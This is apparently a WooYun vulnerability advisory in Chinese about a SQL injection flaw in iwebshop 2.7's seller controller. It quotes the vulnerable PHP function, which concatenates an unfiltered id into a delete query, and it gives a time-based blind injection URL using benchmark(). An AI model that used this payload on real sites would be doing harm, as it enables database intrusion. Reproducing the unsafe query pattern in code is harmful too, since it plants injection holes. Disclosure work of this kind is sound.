iwebshop sql注入漏洞 | wooyun-2014-076985

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-076985

漏洞标题：

iwebshop sql注入漏洞

漏洞详情

披露状态：

2014-09-23：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-12-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

过滤不严导致注入

详细说明：

漏洞细节：
1、漏洞版本：iwebshop2.7.14090000
2、漏洞文件：\iwebshop2.7.14090000\controllers\seller.php
3、漏洞代码：

function regiment_del()
{
$id = IReq::get('id');
if(!empty($id))
{
$regObj     = new IModel('regiment');
$regUserObj = new IModel('regiment_user_relation');
if(is_array($id))
{
$idStr = join(',',$id);
$where = ' id in ('.$idStr.')';
$uwhere= ' regiment_id in ('.$idStr.')';
}
else
{
$where  = 'id = '.$id;
$uwhere = 'regiment_id = '.$id;
}
$regObj->del($where);
$regUserObj->del($uwhere);
$this->redirect('regiment_list');
}
else
{
$this->redirect('regiment_list',false);
Util::showMessage('请选择要删除的id值');
}
}

其中$id = IReq::get('id');未做好过滤
4、利用需要做为商家登陆，商家需要申请
5、利用代码：
http://127.0.0.1/iwebshop2.7.14090000/index.php?controller=seller&action=regiment_del&id=1 and (select if(length(user())=15, benchmark(10000000,md5(1)), 0))

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ywledoc@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ywledoc@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞